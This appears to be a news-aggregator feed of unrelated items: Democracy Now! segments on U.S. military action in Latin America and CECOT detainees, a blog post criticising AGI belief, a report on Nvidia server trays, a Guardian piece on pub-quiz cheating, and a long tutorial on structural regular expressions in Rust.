His success is in part due to massive on-the-ground organizing and an operation of more than 104,000 volunteers. “We knew that we wanted it to be very big,” says Tascha Van Auken, field director for Zohran Mamdani’s mayoral campaign. “We prioritized developing leadership and bringing in as many volunteers as possible.”



Guests

Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

“The Trillion Dollar War Machine”: William Hartung on How U.S. Military Spending Fuels Wars

Democracy Now!
www.democracynow.org
2025-11-14 13:31:44
Democracy Now! speaks to William Hartung about his new book “The Trillion Dollar War Machine” and who profits from the United States’ runaway military spending that fuels foreign wars. Hartung says that U.S. policy is “based on profit” and calls for a rethinking of our foreign entanglements. “...
Original Article

You turn to us for voices you won't hear anywhere else.

Sign up for Democracy Now!'s Daily Digest to get our latest headlines and stories delivered to your inbox every day.

Independent Global News

Donate

Non-commercial news needs your support

We rely on contributions from our viewers and listeners to do our work.
Please do your part today.

Make a donation

“You Have Arrived in Hell”: Venezuelans Sent By U.S. to El Salvador Faced Torture, Sexual Abuse

Democracy Now!
www.democracynow.org
2025-11-14 13:23:43
252 Venezuelan immigrants in the United States were flown to El Salvador in the dead of night and indefinitely imprisoned at the Salvadoran mega-prison CECOT, the Terrorism Confinement Center. The detainees had no ability to communicate to the outside world before they were finally released to Venez...
Original Article

252 Venezuelan immigrants in the United States were flown to El Salvador in the dead of night and indefinitely imprisoned at the Salvadoran mega-prison CECOT , the Terrorism Confinement Center. The detainees had no ability to communicate to the outside world before they were finally released to Venezuela in a prisoner exchange. The men were “subjected to beatings almost daily upon arrival,” says Noah Bullock, executive director of Cristosal who co-authroed a report with Human Rights Watch documenting human rights abuses and torture in the prison.

The report also found that the prison guards were “clearly trying to hide their identities while they were torturing these Venezuelan migrants,” says Juan Pappier, Americas deputy director at Human Rights Watch.


Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

AGI fantasy is a blocker to actual engineering

Hacker News
www.tomwphillips.co.uk
2025-11-14 13:21:24
Comments...
Original Article

Reading Empire of AI by Karen Hao , I was struck by how people associated with OpenAI believe in AGI. They really do think someone, perhaps them, will build AGI, and that it will lead to either the flourishing or destruction of humanity.

Elon Musk founded OpenAI because he thought Demis Hassabis was an evil genius who would build AGI first:

…Musk would regularly characterise Hassabis as a supervillain who needed to be stopped. Musk would make unequivocally clear that OpenAI was the good to DeepMind’s evil. … “He literally made a video game where an evil genius tries to create AI to take over the world,” Musk shouted [at an OpenAI off-site], referring to Hassabis’s 2004 title Evil Genius , “and fucking people don’t see it. Fucking people don’t see it! And Larry [Page]? Larry thinks he controls Demis but he’s too busy fucking windsurfing to realize that Demis is gathering the power.”

OpenAI’s co-founder and chief scientist Ilya Sutskever regularly told audiences and employees to “feel the AGI”. At a company off-site in Yosemite in September 2022, employees gathered around a firepit:

In the pit, [Sutskever] had placed a wooden effigy that he’d commissioned from a local artist, and began a dramatic performance. This effigy, he explained represented a good, aligned AGI that OpenAI had built, only to discover it was actually lying and deceitful. OpenAI’s duty, he said, was to destroy it. … Sutskever doused the effigy in lighter fluid and lit on fire.

I think it’s remarkable that what was until recently sci-fi fantasy has become a mainstream view in Silicon Valley.

Hao writes that GPT-2 was a bet on the “pure language” hypothesis, that asserts that since we communicate through language, then AGI should emerge from training a model solely on language. This is contrast to the “grounding” hypothesis, that asserts an AGI needs to perceive the world. Successfully scaling GPT to GPT-2 convinced enough people at OpenAI that the pure language hypothesis was valid. They just needed more data, more model parameters, and more compute.

So the belief in AGI, plus the recent results from LLMs, necessitates scaling, and justifies building data centres that consume hundreds of litres of water a second , run on polluting gas generators because the grid can’t supply the power ( and might use as much power as entire cities ), driving up CO2 emissions from manufacture and operation of new hardware, and exploits and traumatises data workers to make sure ChatGPT doesn’t generate outputs like child sexual abuse material and hate speech or encourage users to self-harm. (The thirst for data is so great that they stopped curating training data and instead consume the internet, warts and all, and manage the model output using RLHF .)

And this is all fine, because they’re going to make AGI and the expected value (EV) of it will be huge! (Briefly, the argument goes that if there is a 0.001% chance of AGI delivering an extremely large amount of value, and 99.999% chance of much less or zero value, then the EV is still extremely large because (0.001% * very_large_value) + (99.999% * small_value) = very_large_value ).

But AGI arguments based on EV are nonsensical because the values and probabilities are made up and unfalsifiable. They also ignore externalities like environmental damage, which in contrast to AGI, have known negative value and certain probability: costs borne by everyone else right now.

As a technologist I want to solve problems effectively (by bringing about the desired, correct result), efficiently (with minimal waste) and without harm (to people or the environment).

LLMs-as-AGI fail on all three fronts. The computational profligacy of LLMs-as-AGI is dissatisfying, and the exploitation of data workers and the environment unacceptable. Instead, if we drop the AGI fantasy, we can evaluate LLMs and other generative models as solutions for specific problems, rather than all problems, with proper cost benefit analysis. For example, by using smaller purpose-built generative models, or even discriminative (non-generative) models. In other words, make trade-offs and actually do engineering.

Nvidia is gearing up to sell servers instead of just GPUs and components

Hacker News
www.tomshardware.com
2025-11-14 13:18:09
Comments...
Original Article
Nvidia
(Image credit: Nvidia)

The launch of Nvidia's Vera Rubin platform for AI and HPC next year could mark significant changes in the AI hardware supply chain as Nvidia plans to ship its partners fully assembled Level-10 (L10) VR200 compute trays with all compute hardware, cooling systems, and interfaces pre-installed, according to J.P. Morgan (via @Jukanlosreve ). The move would leave major ODMs with very little design or integration work, making their lives easier, but would also trim their margins in favor of Nvidia's. The information remains unofficial at this stage.

Starting with the VR200 platform, Nvidia is reportedly preparing to take over production of fully built L10 compute trays with a pre-installed Vera CPU, Rubin GPUs, and a cooling system instead of allowing hyperscalers and ODM partners to build their own motherboards and cooling solutions. This would not be the first time the company has supplied its partners with a partially integrated server sub-assembly: it did so with its GB200 platform when it supplied the whole Bianca board with key components pre-installed. However, at the time, this could be considered as L7 – L8 integration, whereas now the company is reportedly considering going all the way to L10, selling the whole tray assembly — including accelerators, CPU, memory, NICs, power-delivery hardware, midplane interfaces, and liquid-cooling cold plates — as a pre-built, tested module.

Nvidia
(Image credit: Nvidia/YouTube)

This move promises to shorten the ramp for VR200 as Nvidia's partners will not have to design everything in-house and could lower production costs due to the volume of scale ensured by a direct contract between Nvidia and an EMS (most likely Foxconn as the primary supplier and then Quanta and Wistron, but that is speculation). For example, a Vera Rubin Superchip board recently demonstrated by Jensen Huang uses a very complex design, a very thick PCB, and only solid-state components. Designing such a board takes time and costs a lot of money, so using select EMS provider(s) to build it makes a lot of sense.

J.P. Morgan reportedly mentions the increase in power consumption of one Rubin GPU from 1.4 kW (Blackwell Ultra) to 1.8 kW (R200) and even 2.3 kW (a previously unannounced TDP for an allegedly unannounced SKU (Nvidia declined a Tom's Hardware request for comment on the matter) and increased cooling requirements as one of the motivations for moving to supply the whole tray instead of individual components. However, we know from reported supply chain sources that various OEMs and ODMs, as well as hyperscalers like Microsoft , are experimenting with very advanced cooling systems, including immersion and embedded cooling, which underscores their experience.

However, Nvidia's partners will shift from being system designers to becoming system integrators, installers, and support providers. They are going to keep enterprise features, service contracts, firmware ecosystem work, and deployment logistics, but the 'heart' of the server — the compute engine — is now fixed, standardized, and produced by Nvidia rather than by OEMs or ODMs themselves.

Also, we can only wonder what will happen with Nvidia's Kyber NVL576 rack-scale solution based on the Rubin Ultra platform, which is set to launch alongside the emergence of 800V data center architecture meant to enable megawatt-class racks and beyond. Now the only question is whether Nvidia further increases its share in the supply chain to, say, rack-level integration?

Get Tom's Hardware's best news and in-depth reviews, straight to your inbox.

Google Preferred Source

Follow Tom's Hardware on Google News , or add us as a preferred source , to get our latest news, analysis, & reviews in your feeds.

Anton Shilov is a contributing writer at Tom’s Hardware. Over the past couple of decades, he has covered everything from CPUs and GPUs to supercomputers and from modern process technologies and latest fab tools to high-tech industry trends.

Q: Are phone cheats killing the pub quiz? A: Not according to these question setters

Guardian
www.theguardian.com
2025-11-14 13:17:37
Bans on smart devices, dedicated apps for all players and plain old honesty can all combat trivial offences Who is older, Gary Numan or Gary Oldman? If you know the answer to this question (see below), you are probably one of hundreds of thousands of Brits who attend a pub quiz every week. As a nati...
Original Article

Who is older, Gary Numan or Gary Oldman? If you know the answer to this question (see below), you are probably one of hundreds of thousands of Brits who attend a pub quiz every week.

As a nation of committed trivia buffs, it was unsurprising that news of a quizmaster in Manchester outing a team for cheating was leapt on. Just where, we asked, is the special place in hell reserved for those quizzers who take a sneaky look at their phones under the table?

According to the BBC, a “massive whodunnit” ensued after the landlord at the Barking Dog in Urmston revealed that the cheats were whispering questions into their smartphones, but refused to name and shame them.

It is a misdemeanour that is, according to some quizmasters, an increasingly common blight on one of the nation’s favourite pastimes.

“I think it’s definitely more prolific now, especially with smartwatches – even if you don’t have a phone in your hand, there’s still a way for you to be able to cheat,” said David Hartley, a quizmaster from Staffordshire.

The 33-year-old has hosted quizzes in four venues for nearly a decade and started banning devices about two years ago. “It just takes the mickey out of your quizmaster, if all you’re going to do is sit on your phone,” he said.

David Moyce, the landlord and quizmaster at the Alma in Cambridge, said he recently had to ban a group of students who won in suspicious circumstances. He had suspected cheating after the painfully weak team suddenly played their “joker” – which doubles points – before a round in which they got every question right.

“There was no proof. But then one of the gentlemen came back, handed over some money and said: ‘Yeah, we did cheat,’” Moyce said. “The guilt must have been so heavy on him that he literally handed his share of the money back. None of the others did though, so maybe he slept better than the other four.”

Some pubs have taken hi-tech measures to stop cheats, such as hosting smartphone quizzes where participants have to type in answers on their phones – and lose points if they suspiciously click away from the dedicated quizzing app to use another.

The SpeedQuizzing app promises to see off “the cheats and the chancers” by giving users only 10 seconds per question to lock in their answers in an attempt to restore what it calls “a once proud British tradition”.

Others take more traditional routes. The Prince of Wales in Highgate, north London, has a fiercely peer-policed quiz, according to Marcus Berkmann, who has competed in it more than 200 times and now regularly writes its questions.

“We’re very harsh on anyone who cheats, so no one does it,” said Berkmann, who is the author of A Matter of Facts: The Insider’s Guide to Quizzing. “The regulars would rather boil themselves in oil than cheat.

“Occasionally, you read out a warning and say: ‘We’re testing you on what you know, not what you can look up on Google,’ and people generally go along with that.”

The precise origins of the pub quiz are shrouded in a pre-smoking-ban haze, but they became popular in the 1970s, boosted by Sharon Burns and Tom Porter, whose company Burns and Porter supplied readymade quizzes as a way for pubs to lure drinkers in on quieter nights.

Today, quizzing in the UK remains a serious business, marrying as it does the great British pastimes of drinking and taking pleasure in being right. According to a recent survey commissioned by the brewer Greene King, 70% of people regularly take part in a pub quiz and almost one in 10 goes every single week.

Quizmasters could be forgiven for wanting to return to the simpler times of Burns and Porter, but can also take some solace in knowing that their predecessors also had to deal with cheats.

Gail Taylor, for example, responded to a Guardian callout this week to finally come clean about her youthful cheating in Sheffield pubs in the 1980s.

According to Taylor, she planting rudimentary bugging devices underneath pub tables for transmitting the questions to encyclopedia-armed friends in a van outside.

The Guardian could not independently verify her tale, but she insisted it was true. “Something always went wrong,” Taylor said. “If the signal didn’t work, we’d write the questions down, rush out to the van with two pints and a list, then someone else would go out and bring back the answers. Nobody seemed to catch on what we were doing.”

Reflecting on the crime more than three decades later, Taylor is entirely without remorse. “We didn’t have Google then, so we never won anything anyway,” she says. “I don’t feel guilty about it at all. And if I had the chance, I’d do it again tomorrow.”

Answer: Gary Numan is older than Gary Oldman by 13 days.

A structural regular expression engine for Rust

Lobsters
www.sminez.dev
2025-11-14 13:14:44
Comments...
Original Article

Implementing a structural regular expressions engine for x/fun and.*/ v/profit/

If you have you ever looked at regular expressions and thought "gee, these sure are useful but I wish there was more going on" , then do I have a blog post for you!

OK, hear me out. I promise there's some fun stuff in here that's worth a look. It might only be worth an "oh god why?" kind of look, but worth a look none the less.

Allow me to introduce you to the delightful world of structural regular expressions.

xkcd perl Obligatory XKCD.

I love the smell of regular expressions in the morning

Introduced by Rob Pike in his Sam text editor, and discussed in his 1987 paper , structural regular expressions provide a notation and semantics for composing the regular expressions we all know and love in order to more easily describe the structure of the text being searched.

This composition idea allow for writing chains of smaller, easier to reason about expressions that drill down into the text being searched. The primary goal being to allow you break up the text into meaningful chunks that you care about, rather than always being forced into looping over lines.

It's always easier to understand what is going on with a concrete example. Lets take this easy to start: have a look at the following text and determine the names of each of the programmers and what their language of choice is.

    name: Alice
    occupation: programmer
    language of choice: Rust

    name: Bob
    language of choice: Go
    occupation: programmer

    name: Claire
    occupation: linguist
    language of choice: French

Hopefully it only takes you a second or two to work the answer out. You might not even notice that the order of the fields in each record is inconsistent.

Now, what if I asked you to write me a program to extract that information from the text?

It's not a particularly complicated program to write. For example, the following python script gets the job done just fine:

with open("haystack.txt", "r") as f:
    haystack = f.read()
    for chunk in haystack.split("\n\n"):
        if "programmer" in chunk:
            for line in chunk.split("\n"):
                if "name:" in line:
                    name = line.split(": ")[1]
                elif "lang" in line:
                    lang = line.split(": ")[1]

            print(f"{name} prefers {lang}")

# Prints:
# Alice prefers Rust
# Bob prefers Go

But attempting to do this with regular expressions becomes tricky, if not downright impossible. We can't just look for the names and preferred languages directly as Claire isn't a programmer. Even if we could, we need to extract the name alongside the language, and the language can appear before or after the occupation line. So attempting to cover all cases with a single expression quickly starts to get messy.

Really what we want is the logic from the Python script (minus the manual string manipulation):

  • Split the text into paragraphs
  • Drop any paragraphs that aren't for a programmer
  • Extract the name and language fields
  • Pretty print the results

Which, coincidentally, is what the following structural regular expression 1 does:

y/\n\n/
g/programmer/
x/name: (.*)@*lang.*: (.*)/
p/{1} prefers {2}/
Alice prefers Rust
Bob prefers Go

I'm not sure about you, but personally I think that's pretty cool.

I strongly recommend that you have a read through Rob's paper. It's all of 6 pages long and it does a great job of demonstrating the sorts of problems that regular expression based tools can run into, and how a new approach could help.

The paper also makes a point of calling out that what its doing is highlighting some interesting problems to look into, rather than offering up a fully formed solution, and that the hope is to encourage others to think about how they might apply these ideas elsewhere.

So, with that in mind: lets take a look at how we might take these ideas and run with them!


We're going to need a bigger parser

The syntax used by Pike in Sam combined looping constructs and conditional filters with printing and editing actions such as deleting, replacing or inserting around a match of a regular expression. There have been a handful of other implementations over the years, notably Pike's later editor acme , vis and my own editor ad , all of which follow this same approach of coupling the composition operators with editing actions that are applied to each match. (Sam itself also provided a number of additional operators for working with the state of the editor itself that we wont cover here.)

As we saw in the example above, the syntax used for this takes inspiration from classic regular expressions in being really quite terse. Operators and actions share a common syntax of a single character to identify the action followed by an argument enclosed in forward slashes.

Writing a structural regular expression then involves writing a pipeline of operators ending in an action that is applied to any matches that are found. To kick things off, the selected text begins as the full haystack (or in the case of the text editors, the current selection within the editor). From there, the first operator is run and any matches it finds are passed along to subsequent expressions in the pipeline: additional operators acting with flat-map and filter semantics and actions being applied before processing the next match.

For operators, the argument is always a regular expression re 2 :

  • x/re/ for each match of re , run the expressions that follow
  • y/re/ between each match of re , run the expressions that follow
  • g/re/ if re matches, run the expressions that follow
  • v/re/ if re does not match, run the expressions that follow

For actions, the argument is text to be inserted into the file. 3 :

  • a/text/ append text after the match
  • i/text/ insert text before the match
  • c/text/ change the match to text
  • p/text/ print text
  • d delete the match

Putting it all together

Lets revisit our expression from before:

  y/\n\n/
  g/programmer/
  x/name: (.*)@*lang.*: (.*)/
  p/{1} prefers {2}/

If we look at each line in turn, we can follow the pipeline as it executes and see how it breaks apart the input text to find the answer to our question:

  • y/\n\n/

Our first operator acts as a "split" on the input text, breaking it into three blocks:

    name: Alice
    occupation: programmer
    language of choice: Rust
    name: Bob
    language of choice: Go
    occupation: programmer
    name: Claire
    occupation: linguist
    language of choice: French
  • g/programmer/

Next, we apply a filter to accept only those blocks that contain the expression "programmer":

    name: Alice
    occupation: programmer
    language of choice: Rust
    name: Bob
    language of choice: Go
    occupation: programmer
  • x/name: (.*)@*lang.*: (.*)/

After that we narrow the selection using another regular expression, this time extracting submatches so we have the available for printing:

    name: (Alice)
    occupation: programmer
    language of choice: (Rust)
    name: (Bob)
    language of choice: (Go)
  • p/{1} prefers {2}/

Finally, we use the extracted submatches to fill in our template string and print the result:

Alice prefers Rust
Bob prefers Go

Lovely!

But, what if we also want to deal with the fact that Claire is a linguist? Luckily, the we've got one final piece of syntax to introduce that can help us out there as well.

The final trick we have up our sleeve is to enclose multiple pipelines in curly braces. Doing so marks these separate pipelines as being run in parallel with one another over each match that flows into the "group". Each branch of the parallel group is terminated with a semicolon (of course) and behaves the same as any other chain of operators ending in an action. The difference is that each match produced by the preceding operator in the pipeline is run through all branches of the parallel group simultaneously .

Lets update our original expression to use a parallel group. We'll start the group once we've split the input into blocks, adding an alternative pipeline that will run when the matched text contains "linguist" this time:

 y/\n\n/ {
   g/programmer/
   x/name: (.*)@*lang.*: (.*)/
   p/{1} prefers {2}/;

+  g/linguist/
+  x/name: (.*)@*lang.*: (.*)/
+  p/{1} has no time for this nonsense, they're busy discussing {2}/;
 }

If we run this new expression, we'll get the output we had before (from the original pipeline) along with the output from our second parallel branch:

Alice prefers Rust
Bob prefers Go
Claire has no time for this nonsense, they're busy discussing French

Hopefully now you're starting to see how this sort of system can be a powerful tool to have available! When built into a text editor, these expressions form a mini editing language that allows you do a bunch of useful stuff.

The example we've been looking at so far has just been making use of printing. Lets try editing the text instead using some new, non-controversial text as our input:

You'll make a lot of people angry if you say that Vim is better than Emacs.
(Really, we all know that Emacs is the best).

Now, before anyone gets upset, we can rewrite this to align to the other side of the editor holy war (if you are that way inclined) using the following structural regular expression:

{
  x/Emacs/ c/Vim/;
  x/Vim/ c/Emacs/;
}
You'll make a lot of people angry if you say that Emacs is better than Vim.
(Really, we all know that Vim is the best).

Using a parallel group inside of our structural regular expression allows us to swap Emacs for Vim (and vice versa) simultaneously, avoiding the all too common problem of accidentally ending up with everything turning into "Emacs" because the replacements were run sequentially.


Toto, I don't think we're in Bell Labs anymore

Everything we've seen so far can be found as part of the original Sam engine and its derivatives, and this is perfectly fine for implementing an embedded editing language for a text editor. But, we're missing a trick in being able to provide a general purpose engine that could be adapted for a variety of use cases.

To do that we need to break things apart slightly.

Rather than interleaving the operators and actions into a single system, we can instead write a generic engine that handles the "intentify interesting structure" side of the problem (the operators) which then feeds that structure into the handling logic of your choice (actions that are tailored to the problem you're trying to solve). In effect, what we end up doing is tagging subsections of the text being searched for later processing.

Enter structex : a Rust crate I've been working on recently after overhauling the engine inside of ad that is my attempt to write the engine I've just outlined. In addition to the core functionality of the engine it provides a variety of pieces quality of life functionality in order to make writing custom engines a little simpler, such as a simple templating engine, a builder struct for configuring the behaviour of the expression compiler and a set of traits to allow you to provide your own underlying regular expression engine if needed.

Let's take a look at how we can use structex to write a minimal CLI tool that is capable of running the grep-like pretty-printing expression we started with. If you have a local Rust toolchain installed you can try running this by setting up a new project and adding the regex and structex crates.

use std::collections::HashMap;
use structex::{Structex, template::Template};

fn main() -> Result<(), Box<dyn std::error::Error>> {
    // (1)
    let args: Vec<String> = std::env::args().skip(1).collect();
    let se: Structex<regex::Regex> = Structex::new(&args[0])?;
    let haystack = std::fs::read_to_string(&args[1])?;

    // (2)
    let mut templates = HashMap::new();
    for action in se.actions() {
        let arg = action.arg().unwrap();
        templates.insert(action.id(), Template::parse(arg)?);
    }

    // (3)
    for caps in se.iter_tagged_captures(haystack.as_str()) {
        let id = caps.id().unwrap();
        println!("{}", templates[&id].render(&caps)?);
    }

    Ok(())
}

So what's going on here?

  1. We read in our arguments from the command line and use the first to compile a new Structex using the regex crate as the backing engine. The second argument we simply read in as the haystack we're going to search.
  2. We ask our newly compiled Structex for the actions that it found in the compiled expression and we parse the argument to each action as a Template we can use later to pretty print the match.
  3. We call iter_tagged_captures to find each match inside of the haystack. Every time a match is found it is returned to us with its associated action, allowing us to look up the template and pretty print the result.

To run this, we'll need to slightly tweak the expression we used before: the @ meta-character we were using is a feature of ad 's engine and not supported by the regex crate. Luckily, we can swap it out for (?:.|\n) and achieve the same effect. 4 (Albeit with a much uglier syntax!)

$ cargo run --  '
y/\n\n/ {
  g/programmer/
  x/name: (.*)(?:.|\n)*lang.*: (.*)/
  p/{1} prefers {2}/;

  g/linguist/
  x/name: (.*)(?:.|\n)*lang.*: (.*)/
  p/{1} has no time for this nonsense, they are busy discussing {2}/;
}' haystack.txt

Alice prefers Rust
Bob prefers Go
Claire has no time for this nonsense, they are busy discussing French

Nice!

But what if we want to run the second example? The one where we swapped "Emacs" and "Vim"? There the semantics of what we want to do are a little different. Its more like sed where we default to echoing out unmatched text and modify the text of matches inside of that output stream.

In that case we'll want something more like this:

use std::collections::HashMap;
use structex::{Structex, template::Template};

fn main() -> Result<(), Box<dyn std::error::Error>> {
    let args: Vec<String> = std::env::args().skip(1).collect();
    let se: Structex<regex::Regex> = Structex::new(&args[0])?;
    let haystack = std::fs::read_to_string(&args[1])?;

    // (1)
    let mut templates = HashMap::new();
    for action in se.actions() {
        if let Some(arg) = action.arg() {
            templates.insert(action.id(), Template::parse(arg)?);
        }
    }

    // (2)
    let mut pos = 0;

    for caps in se.iter_tagged_captures(haystack.as_str()) {
        let action = caps.action.as_ref().unwrap();
        let id = action.id();

        // (3)
        if caps.from() > pos {
            print!("{}", &haystack[pos..caps.from()]);
        }

        // (4)
        match action.tag() {
            'd' => (), // just consume the matched text
            'c' => print!("{}", templates[&id].render(&caps)?),
            'i' => print!("{}{}", templates[&id].render(&caps)?, caps.as_slice()),
            'a' => print!("{}{}", caps.as_slice(), templates[&id].render(&caps)?),
            tag => panic!("unknown action {tag}"),
        }

        // (5)
        pos = caps.to();
    }

    // (6)
    if pos < haystack.len() {
        print!("{}", &haystack[pos..]);
    }

    Ok(())
}

A little more going on this time:

  1. We handle our command line arguments the same way, but now when we parse our templates we need to skip actions that don't have a template (like our d delete action).
  2. In order to handle printing out unmatched text, we'll need to track where we are in the input before we start iterating over matches.
  3. Each time we find a match we check to see if its after our current position, if it is then we simply print out the unedited input up until the match.
  4. Next, we check the "tag" of the action associated with the match to determine how it should be handled. We still render the templates as before but how the resulting text makes its way into the output depends on the tag.
  5. After processing each match, we update where we are in the input before handling the next one.
  6. Once all of the matches have been found, we check one last time to see if we need to print any remaining input (otherwise we'd cut things short at the end of the final match!)

Phew! OK, lets test it out:

$ cargo run -- '{
  x/Emacs/ c/Vim/;
  x/Vim/ c/Emacs/;
}' haystack2.txt

You'll make a lot of people angry if you say that Emacs is better than Vim.
(Really, we all know that Vim is the best).

So far so good. We also added support for other actions so lets test them out as well:

$ cargo run -- '{
  n/a lot of / d;        # delete the first occurrence of "a lot of "
  x/Emacs/ i/Gnu /;      # Insert "Gnu " before each occurrence of "Emacs"
  x/Vim/ a/ (or Vi)/;    # Append " (or Vi)" after each occurrence of "Vim"
}' haystack2.txt

You'll make people angry if you say that Vim (or Vi) is better than Gnu Emacs.
(Really, we all know that Gnu Emacs is the best).

It works!

The n operator here is something we haven't seen before: it's an addition I've made to the semantics of Sam's engine that "narrows" to the first match of the given regular expression rather than looping over all matches. In effect it's similar to the classic sed s/regex/replacement/ but it allows for providing further operators or the action of your choice in place of the fixed replacement text.


Wrapping up 5

Now, there is obviously a lot of unwrapping going on in these examples and, if you experiment a little yourself, you'll quickly find that you can get some unexpected behaviour and crashes. To handle things more robustly we'd want to control what sorts of expressions were permitted and we'd need to be a little more careful about how we work with the actions associated with each match.

In the structex repo I've included some more realistic versions of these two programs in the form of the sgrep and ssed examples. They also make use of a copy of ad 's regex engine in order to support matching against streams, allowing you to run them over standard in as well as against named files. If you like the ideas presented in this blog post I'd encourage you to take a look and have a go at adding your own actions to see what sorts of tools you can come up with!

To finish off I'll take one last page out of Rob Pike's book and call out some of the open problems and areas where it might be possible to take this idea in the future. Firstly, there are certainly multiple opportunities for improving the performance of this thing: the current design is based on flexibility and proving out this idea of splitting apart the matching engine and the application of actions to matches. I think that it should be possible to compile expressions down to an automata for direct, efficient execution but at that point you'd no longer be able to bring your own regex engine. Is that worth it? I'm not sure. But it would be fun to try out at some point. It would also be fun to take a stab at implementing a structex based awk (as proposed by Pike in his paper) but I'll be honest, getting a full language implemented is something I'm not sure I have time to tackle at the moment!

So there we have it. A strange new tool to add to your toolbox, or, avoid like the plague if what you've seen here isn't to your taste. But I assume that if you've made it this far you've at least got a passing interest in taking this thing for a spin.

Until next time, happy hacking!




“Gunboat Diplomacy”: U.S. War in Latin America Feared as Hegseth Launches "Operation Southern Spear"

Democracy Now!
www.democracynow.org
2025-11-14 13:13:11
Defense Secretary Pete Hegseth has announced the launch of Operation Southern Spear to target suspected drug traffickers in South America, Central America and the Caribbean. The U.S. now has 15,000 military personnel in the region. Over the past two months the U.S. has blown up at least 20 boats in ...
Original Article

This is a rush transcript. Copy may not be in its final form.

AMY GOODMAN : This is Democracy Now! , democracynow.org, The War and Peace Report. I’m Amy Goodman in New York joined by Democracy Now! ’s Juan González in Chicago. Hi, Juan.

JUAN GONZÁLEZ: Hi, Amy, and welcome to all of our listeners and viewers across the country and around the world.

AMY GOODMAN : Defense Secretary Pete Hegseth has announced the launch of Operation Southern Spear to target suspected drug traffickers, he says. In a post on X, Hegseth wrote, quote, “Today, I’m announcing Operation Southern Spear led by Joint Task Force Southern Spear and SOUTHCOM . This mission defends our homeland, removes narcoterrorism from our hemisphere, and secures our homeland from the drugs that are killing our people,” unquote.

The announcement comes as the Pentagon continues to amass warships in the Caribbean. The USS Gerald R. Ford aircraft carrier arrived earlier this week. The U.S. now has 15,000 military personnel in the region. It’s the largest buildup in the region in decades, according to the New York Times . Over the past two months, the U.S. has blown up at least 20 boats in the Caribbean and Eastern Pacific. The latest strike killed four people on Thursday.

The Pentagon claims the boats were carrying drugs, but officials have acknowledged they don’t know who’s been killed. Critics have denounced the strikes as illegal extrajudicial killings. We begin today’s show with Juan Pappier, the Americas Deputy Director at Human Rights Watch. We welcome you to Democracy Now! , Juan. Begin by talking about Operation Southern Spear and what this means.

JUAN PAPPIER : Amy, thank you for having me. We don’t know what Operation Southern Spear means. The Secretary has not provided details. But we have every reason to be concerned because in the buildup of this announcement, as you mentioned, 80 people have been killed in what are extrajudicial executions under international law.

There is no denying that the problem of narcotics in the United States and the problem of organized violence in Latin America are serious, but they’re not armed conflicts, and the U.S. government cannot pretend otherwise to circumvent its obligations under international law. The U.S. government cannot strike boats as it pleases. These are extrajudicial executions, which are grave violations.

JUAN GONZÁLEZ: And, Juan, isn’t it true that most of the drugs that come into the United States, whether it’s fentanyl or cocaine, come through Mexico, and yet, the Trump administration is directing all of its attention to the Caribbean and the Pacific just off the coast of South America?

JUAN PAPPIER : Well, fentanyl comes from Mexico. Cocaine comes mostly from Colombia, in most cases, through the Pacific. But regardless of the drug routes that are being employed to bring these drugs, striking boats is not the appropriate way to respond to organized crime. These people should be brought to justice, they should be prosecuted, and importantly, the United States should be supporting efforts to dismantle these organized crime groups. Striking vessels in the Caribbean are extrajudicial executions, which are banned by international law.

JUAN GONZÁLEZ: And has there been any attempt by international organizations, especially the United Nations, to address this issue?

JUAN PAPPIER : Well, the U.N. Human Rights Chief, Volker Türk, has expressed concern and consternation about these violations. We have seen expressions of concern by Latin American governments, Colombia, Mexico, Brazil, amongst others. And we at Human Rights Watch have a team ready to document what is happening in the Caribbean and to make sure that we expose and denounce violations of human rights law as they are occurring.

AMY GOODMAN : We’re talking to Juan Pappier, the Americas Deputy Director at Human Rights Watch, and our own Juan González. Juan, you were in Panama for the U.S. invasion. This was during President George H. W. Bush. You certainly know, and have studied and have been there throughout Latin America when it comes to U.S. foreign policy. Can you talk about your observations of what’s happening here with these extrajudicial killings of scores of people? It is astounding that the U.S. has not presented any evidence that they are narcoterrorists, as Pete Hegseth says.

JUAN GONZÁLEZ: Yeah, well, Amy, I think with the – especially now, not only with these attacks on boats and these killings, but now with the arrival of an unprecedented military force – we’re talking the largest aircraft carrier in the world, the USS Gerald Ford, has just arrived in the Caribbean with another 5,000 troops and several other battleships accompanying it.

We now have 15,000 U.S. troops in the region, thousands of them based in Puerto Rico. The government has reopened Roosevelt Roads Naval Base, which they had closed, and U.S. planes at the old Ramey Air Force Base in Aguadilla. All of these soldiers are not there to hang out. They’re there to take military action. We have to be clear.

Even though the government hasn’t announced it, it’s clear that this is what’s coming. Our government is embarking on a totally unprovoked military assault and regime change operations in Latin America. The Trump administration has openly accused not one but two Latin-American presidents of drug dealing without any proof, Nicolas Maduro of Venezuela and Gustavo Petro of Colombia and threatened to kill Maduro. This is a bizarre return to the gunboat diplomacy of the early 20th century.

And the big prize being not democracy or not stopping drug trafficking, but grabbing the Venezuelan oil fields, the largest oil reserves in the world. The problem is, this is not the old Latin America that the U.S. could bully at will. The countries at the region are today independent sovereign states.

For most of South America, the U.S. is no longer even the main trading partner, China is. Next door to Venezuela is Colombia, the country that for more than 50 years was involved in the longest-running civil war in the region’s history and has perhaps the largest number of veteran left-wing guerillas in Latin America’s history. The governments of Brazil, Mexico, Colombia, Honduras, Cuba, and Nicaragua will not just quietly accept U.S. aggression on Venezuela.

President Maduro has appealed for international volunteers to come to Venezuela to oppose any U.S. invasion, and you can bet that perhaps thousands of young Cubans, Nicaraguans, Colombians, and other Latin Americans will do just that.

So, progressives and people of good will of the U.S. and Puerto Rico, it’s time for those of us here to stand up and say that we will not support any attempt to bring back the old gunboat diplomacy and to invade another Latin-American country, and we need to do it soon because this stuff is moving very quickly.

AMY GOODMAN : Juan, you mentioned that you have Venezuela, the largest oil producer in Latin America, that the U.S. is targeting. Then, to everyone’s shock, including many in his own administration, Trump announced he’s going to attack Nigeria, which is Africa’s most populous country and the largest oil producer in Africa. He said that the attack would be vicious and sweet. And then, you go back to Iraq, one of the largest oil producers in the Middle East, before the U.S. invaded Iraq in 2003 after 9/11, which Iraq had nothing to do with.

